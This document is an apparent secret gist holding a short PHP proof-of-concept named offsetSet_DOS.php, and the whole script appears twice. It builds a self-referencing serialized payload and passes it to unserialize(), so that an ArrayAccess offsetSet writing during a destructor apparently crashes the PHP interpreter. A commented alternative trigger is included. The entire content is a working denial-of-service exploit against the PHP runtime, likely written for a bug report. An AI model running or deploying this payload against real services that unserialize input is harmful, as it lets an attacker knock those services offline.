dsadyrin/offsetSet_DOS.php Secret

## offsetSet_DOS.php
<?php

class Obj implements ArrayAccess {

  	public function offsetExists($key) {
        return true;
    }

	public function offsetSet($key, $value) {
		$this->data[123]=  1;		//any offset, need an object property
	}

	public function offsetGet($key) {
	}

	public function offsetUnset($key) {
		return;
	}
}

class A {
	function __destruct() {
		$this->config['username'] = 1;
	}
}


unserialize('O:1:"A":1:{s:6:"config";O:3:"Obj":1:{s:4:"data";R:2;}}');

//If you don't consider code with unserialize function call as security issue, use the code below to trigger the bug.

/*
$o1 = new Obj;
$o1->data = &$o1;

$o2 = new A();
$o2->config = $o1;
*/

?>
	<?php

	class Obj implements ArrayAccess {

	public function offsetExists($key) {
	return true;
	}

	public function offsetSet($key, $value) {
	$this->data[123]= 1; //any offset, need an object property
	}

	public function offsetGet($key) {
	}

	public function offsetUnset($key) {
	return;
	}
	}

	class A {
	function __destruct() {
	$this->config['username'] = 1;
	}
	}


	unserialize('O:1:"A":1:{s:6:"config";O:3:"Obj":1:{s:4:"data";R:2;}}');

	//If you don't consider code with unserialize function call as security issue, use the code below to trigger the bug.

	/*
	$o1 = new Obj;
	$o1->data = &$o1;

	$o2 = new A();
	$o2->config = $o1;
	*/

	?>